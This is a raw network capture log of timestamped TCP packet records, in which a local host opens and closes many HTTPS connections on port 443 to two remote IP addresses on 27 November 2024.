                                                  Nov 27, 2024 18:09:49.766828060 CET49758443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:49.766845942 CET4434975813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.886388063 CET4434975313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.886454105 CET4434975313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.886579037 CET49753443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:49.886814117 CET49753443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:49.886826038 CET4434975313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.886837006 CET49753443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:49.886842012 CET4434975313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.890172005 CET49759443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:49.890217066 CET4434975913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.890317917 CET49759443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:49.890535116 CET49759443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:49.890552044 CET4434975913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.911542892 CET4434975513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.911623001 CET4434975513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.911685944 CET49755443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:49.911995888 CET49755443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:49.912002087 CET4434975513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.912014008 CET49755443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:49.912017107 CET4434975513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.916944981 CET49760443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:49.917001009 CET4434976013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:49.917103052 CET49760443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:49.917383909 CET49760443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:49.917396069 CET4434976013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:50.028418064 CET4434975413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:50.028497934 CET4434975413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:50.028583050 CET49754443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:50.028865099 CET49754443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:50.028865099 CET49754443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:50.028883934 CET4434975413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:50.028893948 CET4434975413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:50.032664061 CET49761443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:50.032701969 CET4434976113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:50.032783031 CET49761443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:50.032965899 CET49761443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:50.032978058 CET4434976113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:50.163815975 CET4434975613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:50.163887024 CET4434975613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:50.163944960 CET49756443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:50.164170027 CET49756443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:50.164196968 CET4434975613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:50.164208889 CET49756443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:50.164216995 CET4434975613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:50.167802095 CET49762443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:50.167834044 CET4434976213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:50.167905092 CET49762443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:50.168046951 CET49762443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:50.168061018 CET4434976213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:50.705569029 CET4434975794.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:50.705852032 CET49757443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:50.705881119 CET4434975794.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:50.707359076 CET4434975794.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:50.707422018 CET49757443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:50.708673954 CET49757443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:50.708760023 CET4434975794.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:50.708857059 CET49757443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:50.708873034 CET4434975794.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:50.753070116 CET49757443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:51.255511045 CET4434975794.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:51.255618095 CET4434975794.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:51.255671978 CET49757443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:51.256174088 CET49757443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:51.256191969 CET4434975794.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:51.256201982 CET49757443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:51.256233931 CET49757443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:51.259042978 CET49763443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:51.259073973 CET4434976394.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:51.259146929 CET49763443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:51.259368896 CET49763443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:51.259383917 CET4434976394.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:51.618177891 CET4434975813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:51.618814945 CET49758443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:51.618849039 CET4434975813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:51.619303942 CET49758443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:51.619309902 CET4434975813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:51.818531036 CET4434976113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:51.819289923 CET49761443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:51.819328070 CET4434976113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:51.820003033 CET49761443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:51.820008039 CET4434976113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:51.871711016 CET4434976013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:51.872289896 CET49760443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:51.872318029 CET4434976013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:51.872800112 CET49760443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:51.872807980 CET4434976013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:51.873269081 CET4434975913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:51.873596907 CET49759443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:51.873636007 CET4434975913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:51.873936892 CET49759443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:51.873944044 CET4434975913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.039937019 CET4434976213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.040627003 CET49762443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.040666103 CET4434976213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.041117907 CET49762443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.041137934 CET4434976213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.057220936 CET4434975813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.057320118 CET4434975813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.057596922 CET49758443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.057640076 CET49758443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.057660103 CET4434975813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.057671070 CET49758443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.057677031 CET4434975813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.060966015 CET49764443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.061002016 CET4434976413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.061095953 CET49764443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.061265945 CET49764443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.061279058 CET4434976413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.327202082 CET4434976113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.327265978 CET4434976113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.327370882 CET49761443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.327611923 CET49761443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.327631950 CET4434976113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.327641964 CET49761443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.327646971 CET4434976113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.331643105 CET49765443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.331676960 CET4434976513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.331764936 CET49765443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.331911087 CET49765443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.331922054 CET4434976513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.333179951 CET4434975913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.333250046 CET4434975913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.333342075 CET4434976013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.333404064 CET49759443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.333431005 CET4434976013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.333468914 CET49760443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.333498001 CET49759443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.333498955 CET49759443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.333535910 CET4434975913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.333561897 CET4434975913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.333574057 CET49760443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.333586931 CET4434976013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.336184978 CET49766443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.336234093 CET4434976613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.336278915 CET49767443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.336287022 CET4434976713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.336312056 CET49766443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.336339951 CET49767443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.336474895 CET49766443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.336483955 CET49767443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.336491108 CET4434976613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.336493969 CET4434976713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.627926111 CET4434976213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.628000021 CET4434976213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.628099918 CET49762443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.628819942 CET49762443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.628840923 CET4434976213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.628854036 CET49762443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.628859043 CET4434976213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.632647038 CET49768443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.632704020 CET4434976813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.632771015 CET49768443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.632952929 CET49768443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:52.632967949 CET4434976813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:52.749542952 CET4434976394.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:52.749912977 CET49763443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:52.749932051 CET4434976394.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:52.750413895 CET4434976394.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:52.750755072 CET49763443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:52.750842094 CET4434976394.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:52.750901937 CET49763443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:52.791371107 CET4434976394.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:53.704848051 CET4434976394.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:53.704894066 CET4434976394.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:53.704927921 CET49763443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:53.704935074 CET4434976394.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:53.704967976 CET4434976394.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:53.704998016 CET49763443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:53.705008984 CET49763443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:53.705024958 CET49763443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:53.725115061 CET4434976394.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:53.725192070 CET49763443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:53.725219011 CET4434976394.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:53.725229979 CET4434976394.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:53.725285053 CET49763443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:53.725610971 CET49763443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:53.725639105 CET4434976394.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:53.762775898 CET49769443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:53.762824059 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:53.762888908 CET49769443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:53.763183117 CET49769443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:53.763197899 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:53.977550983 CET49770443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:53.977577925 CET4434977013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:53.977634907 CET49770443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:53.977858067 CET49771443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:53.977919102 CET4434977113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:53.977989912 CET49771443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:53.978127956 CET49772443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:53.978169918 CET4434977213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:53.978209019 CET49772443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:53.978390932 CET49773443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:53.978432894 CET4434977313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:53.978491068 CET49773443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:53.978550911 CET49774443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:53.978559971 CET4434977413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:53.978604078 CET49774443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:53.978804111 CET49770443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:53.978818893 CET4434977013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:53.978950977 CET49771443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:53.978965044 CET4434977113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:53.979065895 CET49772443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:53.979078054 CET4434977213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:53.979248047 CET49773443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:53.979275942 CET4434977313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:53.979414940 CET49774443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:53.979424953 CET4434977413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.134635925 CET4434976513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.137875080 CET49765443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.137892008 CET4434976513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.138937950 CET49765443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.138947010 CET4434976513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.160021067 CET4434976613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.160540104 CET49766443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.160562038 CET4434976613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.161123037 CET4434976713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.161303043 CET49766443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.161307096 CET4434976613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.161613941 CET49767443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.161628962 CET4434976713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.162262917 CET49767443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.162267923 CET4434976713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.171122074 CET4434976413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.171536922 CET49764443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.171551943 CET4434976413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.174192905 CET49764443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.174197912 CET4434976413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.420175076 CET4434976813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.421261072 CET49768443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.421261072 CET49768443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.421295881 CET4434976813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.421304941 CET4434976813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.570719004 CET4434976513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.570796013 CET4434976513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.570879936 CET49765443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.571095943 CET49765443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.571124077 CET4434976513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.574398041 CET49775443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.574456930 CET4434977513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.574553013 CET49775443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.574727058 CET49775443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.574743986 CET4434977513.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.666549921 CET4434976713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.666630030 CET4434976713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.666735888 CET49767443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.666907072 CET49767443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.666907072 CET49767443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.666924953 CET4434976713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.666934013 CET4434976713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.669733047 CET4434976613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.669843912 CET4434976613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.669895887 CET49766443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.670037985 CET49766443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.670059919 CET4434976613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.670073032 CET49766443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.670078993 CET4434976613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.670552015 CET49776443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.670602083 CET4434977613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.670857906 CET49776443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.671066046 CET49776443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.671086073 CET4434977613.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.672244072 CET49777443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.672267914 CET4434977713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.672439098 CET49777443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.672586918 CET49777443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.672595978 CET4434977713.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.805363894 CET4434976413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.805447102 CET4434976413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.805561066 CET49764443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.807065964 CET49764443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.807085991 CET4434976413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.807101965 CET49764443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.807109118 CET4434976413.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.809946060 CET49778443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.809997082 CET4434977813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.810189962 CET49778443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.810389996 CET49778443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.810406923 CET4434977813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.870229006 CET4434976813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.870306015 CET4434976813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.870450020 CET49768443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.871479988 CET49768443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.871501923 CET4434976813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.871514082 CET49768443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.871520042 CET4434976813.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.874419928 CET49779443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.874448061 CET4434977913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:54.874515057 CET49779443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.874670982 CET49779443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:54.874684095 CET4434977913.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:55.280445099 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:55.280759096 CET49769443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:55.280781031 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:55.281601906 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:55.281924963 CET49769443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:55.282067060 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:55.282068014 CET49769443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:55.327351093 CET4434976994.247.42.112192.168.2.6
                                                  Nov 27, 2024 18:09:55.335382938 CET49769443192.168.2.694.247.42.112
                                                  Nov 27, 2024 18:09:55.736944914 CET4434977113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:55.737205982 CET49771443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:55.737226963 CET4434977113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:55.739022017 CET4434977113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:55.739089966 CET49771443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:55.740191936 CET49771443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:55.740283012 CET4434977113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:55.740416050 CET49771443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:55.740423918 CET4434977113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:55.740442038 CET49771443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:55.766489983 CET4434977013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:55.766784906 CET49770443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:55.766813993 CET4434977013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:55.768315077 CET4434977013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:55.768385887 CET49770443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:55.768831968 CET49770443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:55.768982887 CET4434977013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:55.769232035 CET49770443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:55.769241095 CET4434977013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:55.769260883 CET49770443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:55.783371925 CET4434977113.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:55.791492939 CET49771443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:55.798069000 CET4434977313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:55.798542023 CET49773443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:55.798568010 CET4434977313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:55.801594019 CET4434977313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:55.801662922 CET49773443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:55.802376032 CET49773443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:55.802454948 CET4434977313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:55.802586079 CET49773443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:55.802596092 CET4434977313.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:55.802618027 CET49773443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:55.815324068 CET4434977013.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:55.824178934 CET49770443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:55.825525045 CET4434977213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:55.825988054 CET49772443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:55.826013088 CET4434977213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:55.827043056 CET4434977213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:55.827106953 CET49772443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:55.827415943 CET49772443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:55.827471972 CET4434977213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:55.827595949 CET49772443192.168.2.613.107.246.63
                                                  Nov 27, 2024 18:09:55.827603102 CET4434977213.107.246.63192.168.2.6
                                                  Nov 27, 2024 18:09:55.827624083 CET49772443192.168.2.613.107.246.63
